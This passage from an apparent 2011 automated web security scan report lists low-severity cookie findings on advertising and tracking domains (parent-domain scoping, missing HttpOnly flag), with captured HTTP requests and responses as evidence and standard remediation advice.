Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==; bklc=4da32a72; bk=UzrJrI+7kTPVmCfH; bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxKlBP/t8ftcvyzS1zcmq9YQKivJkG+oHzfP8XYUysrDiC5oeiGepwbJN27dzyFKIF2dIFob5Jcm9k9+Ssn61a/Yc4M674VSb8UVdTQeKALe5dAqr2Yrag02pUwiAOwqbY+2n1wEGmRz8gf8wEUGVcZuH6We7LMZUmSd4l95DOC540K5j7FyNYZwwS4Ae5UKep2iplNgo6ypnl+DXn5aXYck+hsm9yXT4k5X+HH53lde6k7PoIL7yX/UNAZK5kaXAf+v27t+20mXfZjXduj8gptic8hNVGs0bwxJMptoLKpPXaaQ6FrB/NytAHmvO84k+5afTQwaKu8gftaqNPbcd3sJb6pc7+QwGlX4XI+mFq6+1BSEbNdyO6Oq4e; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101ufuVryn9WRyO5z=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 11 Apr 2011 16:21:24 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 12 Apr 2011 16:21:24 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=wcd/Jr+7kTPVmCfH; expires=Sat, 08-Oct-2011 16:21:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxbIu3H+ptLmPQT6R8m10OkUDQionJ+AgJSz+rqqTWwGBzoa9fucax7Z46pLfpc+fZdEUd4p62FR6L6sTeNKanUyaGAv5loD+tNlDnK9Z92jEFhbEFecB4K21a7YsaFRVnhv6NYaXq8gftuxfGzHVzN4wWGI1x8gptwM73PUiRg4LV9GF51zh8f4TIGeiQXJ3FhUltt0YWmSd+K+uk4UlK7iUKloYrsmSI2ZZsfLF9Rpw6wHpsdMeXqMQGunrsFbKA/XBwCGX7o/X1XfpLnnkvIl3ZdSt6y7CI2C05+eZFfjBdq/P00FAHYcBKKXrCIRF9DL3n+7xo8RMK8ycBX2FLmF1aT4ZzBwKNgIC4Q58EJIPJy8pU23CdWdfFxfrX/pNEAKSF2C2M0Laa; expires=Sat, 08-Oct-2011 16:21:24 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 12-Apr-2011 16:21:24 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
5.147. http://tags.bluekai.com/site/668  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/668

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/668 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=kQ199mtFk6lIvnhA; bko=KJ0fyXF9TnCCriXMy0xtOGSTz2B2mHkDQVnFN6dljVm/aVHQK95A1EWDykZJxBAcb6WbJ9HCn9YTgCmQ; bkw5=KJhP6DXgOPWRhdcFlv78odywtP7xMEurvshzGlrbf69SHKcra1UmyLTfsOLFQfK9gspzMSnLfwhqG1Q818w7V1hpb7pmfdxXjT8sQsiBuYIega4O/RpmEX9qah7Q1Hq80uDk66LUs6gA4AJFeS58oG4EZLMjjJWh6A5fVrESAkbIn4aMrSt4oHZHj3l/UmZkAf+jA5W8u1vDLx3TPJVoZ4LXMbT4Kx6VRaBdbawFe7xxn8oX8gb6RBruQaGogNotn/k/uMslfPgiLNgvZXfLVKvhDGgo8+YuAsRooLwMmgusDgRyK6dNRMj2MvZAIYBZbZbXjj7bGSslQgdqs+nqCugAhGzvI6obrfEWTDOJ8kwjg2mt1kdd8Bqvd9n7+aGa; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101U8+B1LU9WQSOAX=; bkst=KJhMR5Mwhze9pkYSk8tUU8TU5tbbnyFexD0CYXCYMC+9xCI9xL/1h3RVCQSVoiqsaZjsOLSZjCjsC7dUQbE8rEa6Icve5HCqsoLjskZSZH+SZCQSs8ZRZvu9oPr96iG1JiZV8AAsjLSb0uZZogoo0zZVrZ7ZkAZbhi7JhL7shGjovSjJbVeNDXe3A2/1DLyLAoB6Qxjjbo3AZ3qGVixjsKiSZOZZVvxZV8QSJOrp8L6a3kXvPYdBTmpGsrp3bsGzZOq3ckbkShRjSopkTIaUbPiudhfLzekKOQRKC7JdPf4zyanwheEwTB5sLTei3dMxxQD9qVJDfQ==; bk=BIMCvr+7kTPVmCfH; bkc=KJh56gav96WxOrOdApr2ud9PfOxnnDyCZL8VmBWrHzeYGJNtaikiHY6DOxUhDOHLqW6SUXvcWOrhD1ioYaG/poh1LMwaL4rhdydezv6/YYzzeojFWQKQHK8rxF7mrOT14aRsCivczmmbfbkovcBK4WMmCC6Kabbu9oGa5LIRXInHWS9t8FOSrzpffn5hvcBKc1UDlxzIc0fbl+7uqC+pUlhKowLSXBHJAhMcrEI1lTtqPKl/Ic+mmpBIBMb56ETh877jJ4/KfKra2g4KE4w8tRF6IKSXmYcdO9TBp8PJvcBKFOludePQN4BvGall7JV9/8g7+pByXxFvutP+fG+FbSNvdNwwXbyh8XDh2KdEdlt/sfFSXtN+wLPditSgR9==

Response

HTTP/1.0 200 OK
Date: Mon, 11 Apr 2011 16:21:06 GMT
Set-Cookie: bklc=4da32a72; expires=Wed, 13-Apr-2011 16:21:06 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 12 Apr 2011 16:21:06 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=UzrJrI+7kTPVmCfH; expires=Sat, 08-Oct-2011 16:21:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56AWgOsWROdedmpFepsbIQC+JvcLxKlBP/t8ftcvyzS1zcmq9YQKivJkG+oHzfP8XYUysrDiC5oeiGepwbJN27dzyFKIF2dIFob5Jcm9k9+Ssn61a/Yc4M674VSb8UVdTQeKALe5dAqr2Yrag02pUwiAOwqbY+2n1wEGmRz8gf8wEUGVcZuH6We7LMZUmSd4l95DOC540K5j7FyNYZwwS4Ae5UKep2iplNgo6ypnl+DXn5aXYck+hsm9yXT4k5X+HH53lde6k7PoIL7yX/UNAZK5kaXAf+v27t+20mXfZjXduj8gptic8hNVGs0bwxJMptoLKpPXaaQ6FrB/NytAHmvO84k+5afTQwaKu8gftaqNPbcd3sJb6pc7+QwGlX4XI+mFq6+1BSEbNdyO6Oq4e; expires=Sat, 08-Oct-2011 16:21:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101ufuVryn9WRyO5z=; expires=Sat, 08-Oct-2011 16:21:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 12-Apr-2011 16:21:06 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
5.148. http://vlog.leadforce1.com/bf/bf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vlog.leadforce1.com
Path:   /bf/bf.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bf/bf.php?idsite=5796&url=http%3A%2F%2Fwww.clickability.com%2F&res=1920x1200&h=19&m=18&s=5&cookie=1&urlref=&rand=0.7162025312427431&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=1&java=1&gears=1&ag=1&action_name=&title=Clickability%20%7C%20www.clickability.com%20%7C%20SaaS%20Web%20Content%20Management%20System%20(WCM)%20for%20Enterprises&_lf1=&vt_=NGJjOTVmNjMxNWNmOWMzMzQyMGVhYjVjMTZmZDlkZTM%3D HTTP/1.1
Host: vlog.leadforce1.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 09 Apr 2011 00:18:12 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: CP='OTI DSP COR NID STP UNI OTPa OUR'
Set-Cookie: lf1_visitor5796=1%3DNzY4ODViM2M0MWMzYWE0ODU2OGIxZDY4OWU0N2MzMTU%3D%3A2%3DMTMwMjMwODI5Mg%3D%3D%3A3%3DMTMwMjMwODI5MA%3D%3D%3A4%3DNTU0ODg0Njk%3D%3A5%3DMjI1MDgxMA%3D%3D; expires=Mon, 08-Apr-2013 00:18:12 GMT; domain=.leadforce1.com
Set-Cookie: lf1_visitor5796=deleted; expires=Fri, 09-Apr-2010 00:18:11 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;
5.149. http://www.valtira.com/gwo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.valtira.com
Path:   /gwo

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwo HTTP/1.1
Host: www.valtira.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Sat, 09 Apr 2011 00:18:21 GMT
Server: Apache
Set-Cookie: JSESSIONID=FF32A2EB15D99A2EE79873F06CAE7589.valtira-com-2; Path=/
Set-Cookie: VLTALT=325428#www.valtira.com; Domain=.valtira.com; Expires=Tue, 06-Apr-2021 00:18:21 GMT; Path=/
Set-Cookie: VLTSID=rHTkRVaEF2pqO; Domain=.valtira.com; Expires=Tue, 06-Apr-2021 00:18:21 GMT; Path=/
Location: http://demo.ods.valtira.com/GWO
Content-Length: 0
Content-Type: text/plain

5.150. http://www.wesh.com/images/structures/misc/play_overlay_small.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wesh.com
Path:   /images/structures/misc/play_overlay_small.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/structures/misc/play_overlay_small.png HTTP/1.1
Host: www.wesh.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Sep 2009 16:28:52 GMT
ETag: "266c010-7a0-cb0e9900"
Accept-Ranges: bytes
Content-Length: 1952
Content-Type: image/png
Cache-Control: max-age=574
Expires: Sat, 09 Apr 2011 12:40:21 GMT
Date: Sat, 09 Apr 2011 12:30:47 GMT
Connection: close
Set-Cookie: alpha=66ce8f18607900007751a04d69db000053710100; expires=Tue, 06-Apr-2021 12:30:47 GMT; path=/; domain=.wesh.com

.PNG
.
...IHDR...%...%....... .....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx..XmLSW......1$..8]..R0..@....pF..K...M0..c]D....%..Y.O...@......e.D....vP`[. .El....9...........s.9.s..=.9.K(...v.....d
...[SNIP]...
5.151. http://www.wmur.com/images/structures/tabs/sponsor_tile_transparent.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wmur.com
Path:   /images/structures/tabs/sponsor_tile_transparent.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/structures/tabs/sponsor_tile_transparent.png HTTP/1.1
Host: www.wmur.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Nov 2008 21:16:37 GMT
ETag: "5056b9f-1a1-8f7bf740"
Accept-Ranges: bytes
Content-Length: 417
Content-Type: image/png
Cache-Control: max-age=637
Expires: Sat, 09 Apr 2011 12:41:22 GMT
Date: Sat, 09 Apr 2011 12:30:45 GMT
Connection: close
Set-Cookie: alpha=57ce8f18196800007551a04d8dc00300d1120100; expires=Tue, 06-Apr-2021 12:30:45 GMT; path=/; domain=.wmur.com

.PNG
.
...IHDR...<...
.......=.....tEXtSoftware.Adobe ImageReadyq.e<...CIDATx....m.0......#.....@G.#.1."#4#..`.x.f.2.=K?.W...]z...}..}..0....=....
~.E.4.....W.d......g/~.a0...>.....7$....W.Q....'..g
...[SNIP]...
5.152. http://www.wptz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wptz.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: AkamaiGHost
Content-Length: 0
Location: /index.html
Cache-Control: max-age=0
Expires: Sat, 09 Apr 2011 12:29:43 GMT
Date: Sat, 09 Apr 2011 12:29:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; expires=Tue, 06-Apr-2021 12:29:43 GMT; path=/; domain=.wptz.com

5.153. http://www.wtp101.com/ab_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /ab_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ab_sync?redir=http%3a%2f%2fads.adbrite.com%2fadserver%2fvdi%2f810647%3fd%3d HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sat, 09 Apr 2011 12:35:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: /ab_sync?ul_cb=1&redir=http%3a%2f%2fads.adbrite.com%2fadserver%2fvdi%2f810647%3fd%3d
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=fcce245a-c15b-4c68-b180-e63dd18b1b28; path=/; expires=Mon, 08 Apr 2013 12:35:47 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

5.154. http://xcdn.xgraph.net/15530/db/xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xcdn.xgraph.net
Path:   /15530/db/xg.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4d97b40ad252fd37 HTTP/1.1
Host: xcdn.xgraph.net
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _xgcid=E5C15F54E89FC1D8CC357C3F58B7D073; _xguid=2D1DC4E5E752B158F1CB915A3433DA9B; _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Sat, 09 Apr 2011 00:21:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:21:59 GMT
Connection: close
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Tue, 08-Apr-2014 00:21:59 GMT; Path=/
Set-Cookie: _push4xgat=1302308519206; Domain=.xgraph.net; Expires=Sun, 10-Apr-2011 00:21:59 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;
5.155. http://y.cdn.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://y.cdn.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html, HTTP/1.1
Host: y.cdn.adblade.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAzczMzMzM5D.NzMzMzMzkPwAAAAAAAAAAAACAwd-20z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqMpwLvyHsCa7x.O.NrHwpEVGlz2pya-BtpgD9AAAAAA==,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,Z%3D300x250%26s%3D1209091%26_salt%3D2946263302%26B%3D10%26r%3D0,e860ecda-6462-11e0-9f69-003048d6d894
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-type: text/html
Date: Mon, 11 Apr 2011 17:41:19 GMT
Expires: Mon, 11 Apr 2011 17:41:19 GMT
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Pragma: no-cache
Server: lighttpd/1.4.18
Set-Cookie: __tuid=2298699369328420558; expires=Sat, 09-Apr-2016 17:41:19 GMT; path=/; domain=.adblade.com
Set-Cookie: __impt=1302543679.804242756343; expires=Tue, 12-Apr-2011 17:41:19 GMT; path=/
X-Powered-By: PHP/5.2.8
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-Length: 14514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
6. Cookie without HttpOnly flag set  previous  next
There are 190 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

6.1. http://affiliate.kickapps.com/service/getWidget.kickAction  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://affiliate.kickapps.com
Path:   /service/getWidget.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/getWidget.kickAction?widgetId=284623&as=62976 HTTP/1.1
Host: affiliate.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerapp_server_pool=1756342464.47135.0000

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F5FCD3B1DB20F6AED2F9B52DD4736293; Path=/
Set-Cookie: as=62976; Expires=Sun, 10-Apr-2011 12:29:50 GMT; Path=/
x-appserver: app2
Location: http://cdnserve.a-widget.com/service/getWidget2.kickAction?as=62976&widgetId=284623
X-Cnection: close
Content-Length: 0
Date: Sat, 09 Apr 2011 12:29:50 GMT

6.2. http://kellwood.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://kellwood.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Type: text/html
Date: Mon, 11 Apr 2011 17:19:45 GMT
Location: home.asp
Set-Cookie: ASPSESSIONIDCCRBTRTR=MAMPEGGBACBNHMNKHBIMHDGB; path=/
Set-Cookie: X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; path=/
X-Powered-By: ASP.NET
Content-Length: 129

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="home.asp">here</a>.</body>
6.3. http://pixel.adsafeprotected.com/jspix  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=140&pubId=5079&campId=3993 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://y.cdn.adblade.com/imps.php?app=3993&output=html&cachebuster=1302543679&tpUrl=http://ads.bluelithium.com/clk?2,13%3B424d78c36f59429c%3B12f45a73f79,0%3B%3B%3B874369504,wT8nBQNzEgAO9YkAAAAAAHm3HgAAAAAAAgAAAAIAAAAAAP8AAAACDcxcHgAAAAAAYoEoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADPQQsAAAAAAAIAAgAAAAAAeT-nRS8BAAAAAAAAAGU4NjBlY2RhLTY0NjItMTFlMC05ZjY5LTAwMzA0OGQ2ZDg5NAA4nyoAAAA=,,http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxnews%2F300x250%2Fpolitics-bottom%3Ft%3D1302543676320%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html%26refer%3Dhttp%253a%252f%252fwww.foxnews.com%252fpolitics%252findex.html,
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
